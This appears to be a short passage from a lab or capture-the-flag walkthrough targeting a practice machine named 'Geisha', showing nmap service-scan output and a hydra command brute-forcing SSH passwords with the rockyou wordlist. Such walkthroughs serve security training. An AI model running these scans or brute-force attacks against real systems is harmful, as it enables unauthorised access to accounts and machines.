1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49

$ export rip=10.0.2.36   
$ sudo nmap -v -A -p- $rip
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      vsftpd 3.0.3
22/tcp   open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 1b:f2:5d:cd:89:13:f2:49:00:9f:8c:f9:eb:a2:a2:0c (RSA)
|   256 31:5a:65:2e:ab:0f:59:ab:e0:33:3a:0c:fc:49:e0:5f (ECDSA)
|_  256 c6:a7:35:14:96:13:f8:de:1e:e2:bc:e7:c7:66:8b:ac (ED25519)
80/tcp   open  http     Apache httpd 2.4.38 ((Debian))
|_http-title: Geisha
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.38 (Debian)
7080/tcp open  ssl/http LiteSpeed httpd
|_http-title: Geisha
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| ssl-cert: Subject: commonName=geisha/organizationName=webadmin/countryName=US
| Issuer: commonName=geisha/organizationName=webadmin/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-05-09T14:01:34
| Not valid after:  2022-05-09T14:01:34
| MD5:   6df2 adf3 8254 f954 1f65 b502 0e94 5985
|_SHA-1: bd05 448c fa9f 3d8a a040 3396 8676 c64d 0f96 9993
|_ssl-date: TLS randomness does not represent time
|_http-server-header: LiteSpeed
| tls-alpn: 
|   h2
|   spdy/3
|   spdy/2
|_  http/1.1
7125/tcp open  http     nginx 1.17.10
|_http-title: Geisha
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.17.10
8088/tcp open  http     LiteSpeed httpd
|_http-title: Geisha
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: LiteSpeed
9198/tcp open  http     SimpleHTTPServer 0.6 (Python 2.7.16)
|_http-title: Geisha
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: SimpleHTTP/0.6 Python/2.7.16

1

$ hydra -l geisha -P /usr/share/wordlists/rockyou.txt -f 10.0.2.36 ssh